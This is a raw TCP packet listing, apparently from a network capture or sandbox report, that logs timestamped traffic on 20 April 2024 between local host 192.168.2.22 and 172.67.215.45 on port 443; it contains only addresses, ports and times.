Apr 20, 2024 11:36:04.289485931 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.289511919 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.289597034 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.290323019 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.290388107 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.290395975 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.290410995 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.290472031 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.290479898 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.291486979 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.291548014 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.291558981 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.291584015 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.291624069 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.292610884 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.292673111 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.292675972 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.292701006 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.292737961 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.293500900 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.293565035 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.293571949 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.293602943 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.293638945 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.294418097 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.294482946 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.294483900 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.294507027 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.294543982 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.295387983 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.295452118 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.295460939 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.295495033 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.295532942 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.296354055 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.296416044 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.296418905 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.296449900 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.296489000 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.297183990 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.297250032 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.297255039 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.297278881 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.297314882 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.298274040 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.298336029 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.298336983 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.298360109 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.298403025 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.299248934 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.299318075 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.299319983 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.299345970 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.299397945 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.300141096 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.300204992 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.300214052 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.300230026 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.300275087 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.301074028 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.301156044 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.301161051 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.301187038 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.301218987 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.301239014 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.301661015 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.301729918 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.301732063 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.301753044 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.301789045 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.302736044 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.302802086 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.302807093 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.302834988 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.302881956 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.303622007 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.303684950 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.303711891 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.303725958 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.303752899 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.304449081 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.304517984 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.304517984 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.304541111 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.304585934 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.305433989 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.305496931 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.305500031 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.305522919 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.305566072 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.306319952 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.306389093 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.306390047 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.306416988 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.306622028 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.307296991 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.307359934 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.307360888 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.307385921 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.307429075 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.308790922 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.308860064 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.308860064 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.308891058 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.308936119 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.309062958 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.309120893 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.309127092 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.309151888 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.309196949 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.310018063 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.310086966 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.310090065 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.310115099 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.310163975 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.310878038 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.310944080 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.310946941 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.310966969 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.311002970 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.311814070 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.311882973 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.311883926 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.311909914 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.311953068 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.312774897 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.312839031 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.312839985 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.312865019 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.312906981 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.313713074 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.313781977 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.313807011 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.313819885 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.313848019 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.314390898 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.314466000 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.314471006 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.314502001 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.314563990 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.315346003 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.315414906 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.315416098 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.315438986 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.315481901 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.316430092 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.316490889 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.316493034 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.316517115 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.316561937 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.317241907 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.317301035 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.317312002 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.317337036 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.317384005 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.318084955 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.318142891 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.318150043 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.318161964 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.318176985 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.318207979 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.319087982 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.319155931 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.319156885 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.319180965 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.319252014 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.319859028 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.319921017 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.319926023 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.319951057 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.319993973 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.320610046 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.320677996 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.320677996 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.320703030 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.320753098 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.321604013 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.321666956 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.321670055 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.321691036 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.321734905 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.322530031 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.322593927 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.322598934 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.322616100 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.322657108 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.323604107 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.323671103 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.323673010 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.323697090 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.323740959 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.324418068 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.324480057 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.324485064 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.324506998 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.324539900 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.326066017 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.326106071 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.326123953 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.326138020 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.326167107 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.326179028 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.326206923 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.326225042 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.326239109 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.326265097 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.326282978 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.327006102 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.327039003 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.327069998 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.327081919 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.327110052 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.327974081 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.328007936 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.328043938 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.328063011 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.328084946 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.328769922 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.328804016 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.328830957 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.328843117 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.328867912 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.329395056 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.329422951 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.329449892 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.329468012 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.329490900 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.330163956 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.330195904 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.330220938 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.330234051 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.330261946 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.330859900 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.330895901 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.330918074 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.330935955 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.331059933 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.331059933 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.331197977 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.331231117 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.331253052 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.331265926 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.331291914 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.332040071 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.332067966 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.332122087 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.332122087 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.332137108 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.332871914 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.332905054 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.332935095 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.332947016 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.332976103 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.333015919 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.333048105 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.333085060 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.333085060 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.333098888 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.333127022 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.333208084 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.333827019 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.333863974 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.333882093 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.333894968 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.333911896 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.334570885 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.334604025 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.334640980 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.334654093 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.334683895 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.335515022 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.335544109 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.335582972 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.335596085 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.335619926 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.335623980 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.335664034 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.335679054 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.335690975 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.335725069 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.335726023 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.336390018 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.336425066 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.336456060 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.336473942 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.336497068 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.336497068 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.337410927 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.337444067 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.337471008 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.337483883 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.337511063 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.337526083 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.337562084 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.337591887 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.337605953 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.337632895 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.337632895 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.338416100 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.338450909 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.338481903 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.338495970 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.338522911 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.339148045 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.339175940 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.339209080 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.339226007 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.339248896 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.339994907 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.340034962 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.340070009 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.340087891 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.340112925 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.340123892 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.340142012 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.340167999 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.340181112 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.340207100 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.340997934 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.341028929 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.341062069 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.341073990 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.341099024 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.341916084 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.341953993 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.341983080 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.342000008 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.342020988 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.342025042 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.342061996 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.342077017 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.342088938 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.342118025 CEST	49163	443	192.168.2.22	172.67.215.45
